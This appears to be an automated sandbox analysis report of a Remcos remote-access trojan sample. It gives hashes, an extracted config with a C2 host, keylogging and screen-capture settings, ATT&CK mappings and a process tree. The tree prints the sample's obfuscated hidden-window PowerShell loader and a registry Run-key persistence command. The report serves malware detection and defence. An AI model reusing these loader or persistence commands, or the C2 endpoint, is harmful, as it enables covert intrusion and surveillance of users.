remcos | f15598708dc31075551274589e74d332be05fdd17c30c61605758aba3a6c7848

General

Target

MalwareBazaar.exe
Size

432KB
MD5

a35683ad12f004d512b53db7e56c0f1e
SHA1

b374ded49f0cbb44d62eacc4559a0599fc8e7693
SHA256

f15598708dc31075551274589e74d332be05fdd17c30c61605758aba3a6c7848
SHA512

4dcf4304c9e78dbc8d10b651b7b2d05f57afb6a48cb4171e424aad4ec85b088d038a5a74c657d9160e75c9c4ec96cca820c859affde6fadef463e87fb5d2c576
SSDEEP

12288:bgoBof8NmB40NiOzwwbbihF1EbdLPrsHTbqDDR6:Cf8NmuizL8uouHc

Score

10^/10

remcos remotehost execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

newskingdomz.live:22330

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-5DIOEW
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2372	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\\Dandyishly\\').Gunnysacks;%Overimportance% ($Fingerboard)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2800	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2372	powershell.exe
2800	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2372 set thread context of 2800	2372	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2896	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2372	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 2372	2556	MalwareBazaar.exe	30
PID 2556 wrote to memory of 2372	2556	MalwareBazaar.exe	30
PID 2556 wrote to memory of 2372	2556	MalwareBazaar.exe	30
PID 2556 wrote to memory of 2372	2556	MalwareBazaar.exe	30
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2372 wrote to memory of 2800	2372	powershell.exe	34
PID 2800 wrote to memory of 2784	2800	wab.exe	35
PID 2800 wrote to memory of 2784	2800	wab.exe	35
PID 2800 wrote to memory of 2784	2800	wab.exe	35
PID 2800 wrote to memory of 2784	2800	wab.exe	35
PID 2784 wrote to memory of 2896	2784	cmd.exe	37
PID 2784 wrote to memory of 2896	2784	cmd.exe	37
PID 2784 wrote to memory of 2896	2784	cmd.exe	37
PID 2784 wrote to memory of 2896	2784	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden " $Debutromanen151=cat 'C:\Users\Admin\AppData\Local\problemlst\capsulogenous\Dicyema.Bra';$Postekspeditioner=$Debutromanen151.substring(50811,3);.$Postekspeditioner($Debutromanen151)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2372
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2784
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\problemlst\capsulogenous\Anekdoters.Exp

Filesize
320KB

MD5
4b061f44cc00f0baf2507082281dc656

SHA1
b48a02471a41631c45c0a72572d894fdfa9f822e

SHA256
b2f855ba79a403d4fcdf9aeca479230165dae928867773e8e2c01f5eb13b8bfe

SHA512
b0aca9c332d49d4219252fc3116bdad0a8597f48e3bb9529e3b83251339fdcb5a537c509a967097e1899c4dae3c6f16046163c40a4a8bc0b9d5e6f45e72acaa6

Download Submit
C:\Users\Admin\AppData\Local\problemlst\capsulogenous\Dicyema.Bra

Filesize
77KB

MD5
f3046f76eef0b6e7bfa0b2ea4f96dbc4

SHA1
c88ba1baf506c20a95f39bdea30b7e9886c84f89

SHA256
92be7fec38ebcbd57e75b7ae02e7e8b3d73ccfd0cc3eaea3e1ea72ab60c946e6

SHA512
84cce01131e12290db43337b9fc34e3835974014632cbfc39dba4ba1186ca66211d8ddc0e985c0431b4ed0e510b4b7aff6cb19aa5b78373408e7ca4e406b2b74

Download Submit
memory/2372-18-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-13-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-12-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-15-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-11-0x0000000073A21000-0x0000000073A22000-memory.dmp

Filesize
4KB

Download
memory/2372-14-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-20-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2372-21-0x0000000006580000-0x000000000A229000-memory.dmp

Filesize
60.7MB

Download
memory/2372-22-0x0000000073A20000-0x0000000073FCB000-memory.dmp

Filesize
5.7MB

Download
memory/2800-23-0x0000000000250000-0x00000000012B2000-memory.dmp

Filesize
16.4MB

Download
memory/2800-24-0x0000000000250000-0x00000000012B2000-memory.dmp

Filesize
16.4MB

Download
memory/2800-28-0x0000000000250000-0x00000000012B2000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads